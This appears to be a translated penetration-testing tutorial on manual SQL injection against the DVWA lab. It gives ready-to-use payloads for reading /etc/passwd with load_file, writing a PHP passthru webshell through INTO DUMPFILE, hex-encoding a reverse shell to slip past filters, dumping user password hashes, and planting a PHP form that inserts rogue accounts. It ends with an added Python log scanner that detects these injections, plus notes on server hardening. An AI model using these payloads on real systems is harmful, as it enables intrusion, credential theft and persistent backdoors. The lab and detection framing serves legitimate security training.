Newbie Diary 40: Kali Penetration Testing - Web Penetration - Manual SQL Injection (II): Reading Files, Writing Files, Reverse Shell

Source: Internet
Author: User

SQL Manual Injection

1. Reading files (the load_file function)

' union select NULL,load_file('/etc/passwd')--+


2. Writing files

' union select NULL,"<?php passthru($_GET['cmd']); ?>" into dumpfile "/var/www/a.php"--+
Writes a web trojan. into dumpfile: MySQL syntax that writes the query result out of the database into a file.

### This statement usually fails with a "cannot write" error because of missing permissions: the account that MySQL runs as must itself have write access to the target directory.

' union select NULL,"<?php passthru($_GET['cmd']); ?>" into dumpfile "a.php"--+
With a relative file name the file is written to the default path: /var/lib/mysql/dvwa/a.php (the data directory of the dvwa database).

### When there is no permission to write into the desired directory, combine the file write with a file inclusion vulnerability.

First write into the world-writable directory /tmp/, then combine that with the file inclusion vulnerability:

' union select NULL,"<?php passthru($_GET['cmd']); ?>" into dumpfile "/tmp/a.php"--+


Note: when the web trojan is injected through the URL, the characters "<", "?", "php" and ">" may trigger the filtering mechanism, so an encoding bypass is used.

### Convert the web trojan into hex; when the value is stored with into dumpfile the database converts it back into the PHP code.

Copy the reverse shell

Modify the IP address in the reverse shell


cat b.php | xxd -ps    (xxd: the hex dump tool shipped with Linux; -ps: output a plain hex dump without offsets)

# The hex output contains newline characters, so one more pipe stage is needed to tidy it up.

cat b.php | xxd -ps | tr -d '\n'    (tr -d: delete the given characters)

Then replace the plaintext PHP in the payload with the hex-encoded form, written as 0x followed by the hex string:

(0x<hex string>)

3. Saving the dumped data ("dragging the database")

' union select NULL,concat(user,0x3a,password) from users into outfile '/tmp/a.db'--+
(0x3a is the colon character used as a separator.)

# If there is no vulnerability such as file inclusion through which the dumped file can be downloaded, limit the number of rows per query and copy and paste the results step by step to steal the data.

When uploading a webshell does not achieve the goal of the operation, you can write your own server-side code for your own use.

# This requires sufficient knowledge of the target: the database structure, the table structure and the programming logic.

Create a form that inserts an account into the application's users table (because the encrypted content in the database is hard to crack); this amounts to developing a function of your own.

' union select NULL,'<?php
if (isset($_POST["Submit"])) {
  // read the submitted form fields (interpolated unescaped into the INSERT below, as in the original)
  $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"];
  $username = $_POST["username"]; $avatar = $_POST["avatar"];
  echo "userID: $userID<br>"; echo "first_name: $first_name<br>"; echo "last_name: $last_name<br>";
  echo "username: $username<br>"; echo "avatar: $avatar<br>";
  $con = mysqli_connect("", "root", "", "dvwa");
  if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); }
  else { echo "Connected to database<br>"; }
  $password = "123";
  // \\" is used because the code passes through a MySQL string literal, which turns it into \"
  $sql = "INSERT INTO dvwa.users VALUES (\\"$userID\\", \\"$first_name\\", \\"$last_name\\", \\"$username\\", MD5(\\"$password\\"), \\"$avatar\\")";
  if (mysqli_query($con, $sql)) { echo "[successful insertion]: $sql"; }
  else { echo "Error creating database: " . mysqli_error($con); }
  mysqli_close($con);
}
?>
<form method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
  <input type="text" name="userID" value=""><br>
  <input type="text" name="first_name" value="fh"><br>
  <input type="text" name="last_name" value="y"><br>
  <input type="text" name="username" value="yfh"><br>
  <input type="text" name="avatar" value="yfh!"><br>
  <input type="submit" name="Submit" value="Submit form"><br>
</form>' into dumpfile '/tmp/user.php'--+
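As an added example (not part of the original post), the following Python script shows the detection side of the techniques above: it decodes request URLs from web-server access logs, expands MySQL 0x hex literals so the hex-encoded bypass from the post is inspected as plain text, and flags union select, load_file(), into outfile/dumpfile and PHP open tags in the query string. The log lines, the request path and the IP address are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the primitives described in the post: UNION injection, load_file()
# reads, INTO OUTFILE/DUMPFILE writes and a PHP open tag in the query string.
PATTERNS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "into_file": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "php_tag": re.compile(r"<\?php"),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]{2,})\b")  # query is lower-cased first
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(query: str) -> str:
    """URL-decode twice (catches double encoding), collapse whitespace, lower-case."""
    text = unquote_plus(unquote_plus(query))  # 2nd pass turns a literal '+' into a space; fine for matching
    return re.sub(r"\s+", " ", text).lower()

def decode_hex_literals(text: str) -> str:
    """Expand MySQL 0x... literals so the hex-encoded payload from the post is seen as text."""
    def expand(m: re.Match) -> str:
        try:
            return bytes.fromhex(m.group(1)).decode("latin-1")
        except ValueError:  # odd digit count: not a valid hex literal, leave it as is
            return m.group(0)
    return HEX_LITERAL.sub(expand, text)

def classify(url: str) -> list[str]:
    """Names of the signatures that match one request URL (empty list if none)."""
    text = decode_hex_literals(normalise(urlsplit(url).query))
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

def scan_access_log(lines):
    """Yield (client_ip, url, hits) for combined-format lines that trip a signature."""
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (hits := classify(m.group(2))):
            yield m.group(1), m.group(2), hits

# Constructed sample log (hypothetical host and IP): one normal request, one
# load_file() read, one hex-encoded "<?php echo 1; ?>" written with INTO DUMPFILE.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnerabilities/sqli/?id=%27+union+select+NULL%2Cload_file%28%27%2Fetc%2Fpasswd%27%29--%2B HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /vulnerabilities/sqli/?id=%27+union+select+NULL%2C0x3c3f706870206563686f20313b203f3e+into+dumpfile+%27%2Ftmp%2Fa.php%27--%2B HTTP/1.1" 200 4100',
]

def demo() -> list:
    return list(scan_access_log(SAMPLE_LOG))  # the two injection requests are returned
```

On the server side the same primitives are blocked by denying the application account the FILE privilege and by setting secure_file_priv, which is why the post's writes so often fail with a permission error.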
